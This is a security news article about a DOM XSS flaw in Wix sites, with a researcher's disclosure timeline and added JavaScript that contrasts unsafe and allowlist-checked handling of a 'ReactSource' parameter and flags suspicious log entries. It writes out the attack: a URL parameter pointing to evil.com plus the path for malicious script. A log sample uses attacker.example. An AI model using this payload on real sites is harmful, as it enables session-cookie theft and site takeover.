Have you heard of wix(.)com?
Wix.com is a cloud-based web development platform designed for users to build HTML5 web sites and mobile sites through the use of the company’s online drag and drop tools.
Unfortunately, a serious XSS bug has been discovered on the platform currently endangering millions of websites and users.
Wix(.)com has a serious XSS bug, researcher says
As reported by security researchers, the service hosts millions of websites and has 87 million registered users. The scary part is that all of these users are currently exposed to the XSS vulnerability. Attackers can exploit it in a worm-like manner to take over administrator accounts, and once that is done they have full control over the compromised websites.
The XSS vulnerability was disclosed by Matt Austin from Contrast Security. He wrote:
A simple line of code is enough to trigger the bug
The attack is triggered simply by appending a redirection parameter to any URL on wix(.)com, which causes the page to load malicious JavaScript. See the example below:
- Add: ?ReactSource=https://evil.com to any URL for any site created on wix.com.
- Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js
These simple steps are enough for attackers to be sure that their JS is loaded and executed as part of the targeted website, the researcher explains. Attackers are also able to gain access to admin session cookies and resources, a very bad scenario indeed. Once a session cookie is harvested, attackers can freely place the DOM XSS in an iframe in order to host malicious content on any website administered by that operator.
Upon success, this attack can be leveraged for malware distribution, website modification, cryptocurrency mining, altering account credentials, etc.
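The weakness described above is a script location taken straight from a query parameter. The following is an added example, not Wix's code or the researcher's, that contrasts that unsafe pattern with a hardened version that only honours the parameter when it resolves to an allowlisted https origin, and adds a small detection routine over constructed access-log lines. The parameter name and script path come from the article; the CDN origin, site hostname, log lines and function names are assumptions made for illustration.

```javascript
// Added example (not Wix's code): unsafe vs. hardened handling of a script
// source supplied by a query parameter, plus log-based detection.
// All names, URLs and log lines are constructed for illustration.

// Hypothetical default location of the loader script.
const DEFAULT_SOURCE =
  "https://static.example-cdn.test/packages-bin/wixCodeInit/wixCodeInit.min.js";

// Hypothetical allowlist of origins that may serve the loader script.
const ALLOWED_ORIGINS = new Set(["https://static.example-cdn.test"]);

// Unsafe pattern: whatever the visitor puts in ?ReactSource= becomes the
// script's origin, so any attacker-controlled host can supply the code.
function unsafeScriptSource(pageUrl) {
  const override = new URL(pageUrl).searchParams.get("ReactSource");
  return override
    ? override + "/packages-bin/wixCodeInit/wixCodeInit.min.js"
    : DEFAULT_SOURCE;
}

// Hardened pattern: the override is only honoured when it parses as an
// absolute https URL whose origin is on the allowlist; anything else
// (missing, relative, malformed, http, unknown host) falls back to the default.
function safeScriptSource(pageUrl, allowedOrigins = ALLOWED_ORIGINS) {
  const override = new URL(pageUrl).searchParams.get("ReactSource");
  if (!override) return DEFAULT_SOURCE;
  let parsed;
  try {
    parsed = new URL(override);
  } catch (e) {
    return DEFAULT_SOURCE; // relative or malformed value: ignore it
  }
  if (parsed.protocol !== "https:" || !allowedOrigins.has(parsed.origin)) {
    return DEFAULT_SOURCE;
  }
  return parsed.origin + "/packages-bin/wixCodeInit/wixCodeInit.min.js";
}

// Detection: flag access-log requests whose ReactSource parameter points
// anywhere other than an allowlisted origin. Returns one record per hit.
function findSuspiciousRequests(logLines, allowedOrigins = ALLOWED_ORIGINS) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/"(?:GET|POST) (\S+) HTTP/);
    if (!m) continue;
    // Resolve the request path against a placeholder host so URL() can parse it.
    const url = new URL(m[1], "https://site.example");
    const override = url.searchParams.get("ReactSource");
    if (!override) continue;
    let origin;
    try {
      origin = new URL(override).origin;
    } catch (e) {
      origin = "(unparseable)";
    }
    if (!allowedOrigins.has(origin)) hits.push({ path: url.pathname, origin });
  }
  return hits;
}

// Constructed sample log lines: one benign request, one pointing the loader
// at an unknown host, one pointing it at the allowlisted CDN.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2016:12:00:00 +0000] "GET /about HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Oct/2016:12:00:01 +0000] "GET /about?ReactSource=https://attacker.example HTTP/1.1" 200 512',
  '203.0.113.7 - - [10/Oct/2016:12:00:02 +0000] "GET /shop?ReactSource=https://static.example-cdn.test HTTP/1.1" 200 512',
];

console.log(findSuspiciousRequests(SAMPLE_LOG));
```

The allowlist is keyed on the full origin (scheme, host and port) rather than a hostname substring, so lookalike hosts and downgraded http URLs are rejected together with unparseable values. The same origin check can be applied at the log layer to spot exploitation attempts after the fact.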
What did Wix say?
As for the communication with wix(.)com, the researcher shares the following experience:
Oct 10: Creates support ticket requesting security contact.
Oct 11: Reach out to @wix on twitter to find a security contact. Replied to use standard support. Gave details in created ticket. Ticket page no longer works. https://www.wix.com/support/html5/contact.
Oct 14: Received standard “We are investigating the matter and will follow up as soon as possible” reply from Wix.
Oct 20: Reply to ticket requesting an update. (no response)
Oct 27: Second request for an update. (no response)
On October 28, the researcher finally received a response, which stated that the "group you tried to contact (security) may not exist, or you may not have permission to post messages to the group."
Nonetheless, the CEO of Wix, Avishai Abrahami, eventually admitted that certain aspects of the platform are based on the WordPress open-source library. He claims that whatever was improved upon was released back to the community, ZDNet reports.